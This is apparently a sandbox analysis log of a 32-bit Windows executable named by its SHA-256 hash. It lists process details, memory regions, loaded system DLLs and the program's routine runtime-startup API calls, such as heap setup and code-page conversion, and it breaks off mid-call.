# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 03.08.2022 17:29:44.104 Process: id = "1" image_name = "19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" page_root = "0x37c3b000" os_pid = "0x1358" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 117 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 118 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 119 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 120 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 121 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 122 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 123 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 124 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 125 start_va = 0x400000 end_va = 0x24affff monitored = 1 entry_point = 0x416797 region_type = mapped_file name = "19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe") Region: id = 126 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 127 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 128 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 129 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 130 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 131 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 270 start_va = 0x1c0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 271 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 272 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 273 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 275 start_va = 0x24b0000 end_va = 0x25cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 276 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 277 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 280 start_va = 0x25d0000 end_va = 0x268dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 281 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 282 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 283 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 284 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 285 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 286 start_va = 0x2690000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 287 start_va = 0x26d0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 288 start_va = 0x27d0000 end_va = 0x2957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027d0000" filename = "" Region: id = 289 start_va = 0x2960000 end_va = 0x2989fff monitored = 0 entry_point = 0x2965680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 290 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 291 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 292 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 293 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 294 start_va = 0x2960000 end_va = 0x2ae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002960000" filename = "" Region: id = 295 start_va = 0x2af0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002af0000" filename = "" Region: id = 296 start_va = 0x3ef0000 end_va = 0x3fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 297 start_va = 0x3fc0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fc0000" filename = "" Region: id = 298 start_va = 0x1d0000 end_va = 0x1d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 299 start_va = 0x1d0000 end_va = 0x1d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 300 start_va = 0x1d0000 end_va = 0x1d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 301 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 302 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 303 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 304 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 305 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 306 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 307 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 308 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 309 start_va = 0x3ef0000 end_va = 0x3f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 310 start_va = 0x3fb0000 end_va = 0x3fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 311 start_va = 0x3f30000 end_va = 0x3f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f30000" filename = "" Region: id = 312 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 313 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 314 start_va = 0x3fc0000 end_va = 0x407bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fc0000" filename = "" Region: id = 315 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 316 start_va = 0x713a0000 end_va = 0x713bcfff monitored = 0 entry_point = 0x713a3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 317 start_va = 0x24b0000 end_va = 0x24b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 318 start_va = 0x24d0000 end_va = 0x25cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 334 start_va = 0x24b0000 end_va = 0x24b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Thread: id = 1 os_tid = 0x135c [0076.016] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0076.016] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.016] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3fb0000 [0076.017] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0076.017] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0076.017] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0076.017] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0076.017] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0076.019] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x214) returned 0x3fb05a8 [0076.019] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0076.019] GetCurrentThreadId () returned 0x135c [0076.019] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0076.019] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x800) returned 0x3fb07c8 [0076.020] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0076.020] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0076.020] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0076.020] SetHandleCount (uNumber=0x20) returned 0x20 [0076.020] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe\" " [0076.020] GetEnvironmentStringsW () returned 0x24dfd20* [0076.020] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x0, Size=0xa1a) returned 0x3fb0fd0 [0076.020] FreeEnvironmentStringsW (penv=0x24dfd20) returned 1 [0076.020] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24a6290, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe")) returned 0x62 [0076.020] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x0, Size=0xce) returned 0x3fb19f8 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x90) returned 0x3fb1ad0 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x3e) returned 0x3fb1b68 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x5c) returned 0x3fb1bb0 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x6e) returned 0x3fb1c18 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x78) returned 0x3fb1c90 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x62) returned 0x3fb1d10 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x28) returned 0x3fb1d80 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x48) returned 0x3fb1db0 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x1a) returned 0x3fb1e00 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x3a) returned 0x3fb1e28 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x62) returned 0x3fb1e70 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x2a) returned 0x3fb1ee0 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x2e) returned 0x3fb1f18 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x1c) returned 0x3fb1f50 [0076.021] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0xd2) returned 0x3fb1f78 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x7c) returned 0x3fb2058 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x36) returned 0x3fb20e0 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x3a) returned 0x3fb2120 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x90) returned 0x3fb2168 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x24) returned 0x3fb2200 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x30) returned 0x3fb2230 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x36) returned 0x3fb2268 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x48) returned 0x3fb22a8 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x52) returned 0x3fb22f8 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x3c) returned 0x3fb2358 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0xd6) returned 0x3fb23a0 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x2e) returned 0x3fb2480 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x1e) returned 0x3fb24b8 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x2c) returned 0x3fb24e0 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x54) returned 0x3fb2518 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x52) returned 0x3fb2578 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x24) returned 0x3fb25d8 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x42) returned 0x3fb2608 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x2c) returned 0x3fb2658 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x44) returned 0x3fb2690 [0076.022] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x24) returned 0x3fb26e0 [0076.028] HeapFree (in: hHeap=0x3fb0000, dwFlags=0x0, lpMem=0x3fb0fd0 | out: hHeap=0x3fb0000) returned 1 [0076.029] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0076.029] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x800) returned 0x3fb2710 [0076.029] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x8, Size=0x80) returned 0x3fb2f18 [0076.029] GetLastError () returned 0x0 [0076.030] SetLastError (dwErrCode=0x0) [0076.030] GetLastError () returned 0x0 [0076.030] SetLastError (dwErrCode=0x0) [0076.030] GetLastError () returned 0x0 [0076.030] SetLastError (dwErrCode=0x0) [0076.030] GetACP () returned 0x4e4 [0076.030] RtlAllocateHeap (HeapHandle=0x3fb0000, Flags=0x0, Size=0x220) returned 0x3fb0fd0 [0076.030] GetLastError () returned 0x0 [0076.030] SetLastError (dwErrCode=0x0) [0076.030] IsValidCodePage (CodePage=0x4e4) returned 1 [0076.030] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0076.030] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0076.030] GetLastError () returned 0x0 [0076.030] SetLastError (dwErrCode=0x0) [0076.030] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.030] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ") returned 256 [0076.030] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0076.030] GetLastError () returned 0x0 [0076.030] SetLastError (dwErrCode=0x0) [0076.030] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.030] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0076.031] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0076.031] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0076.031] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 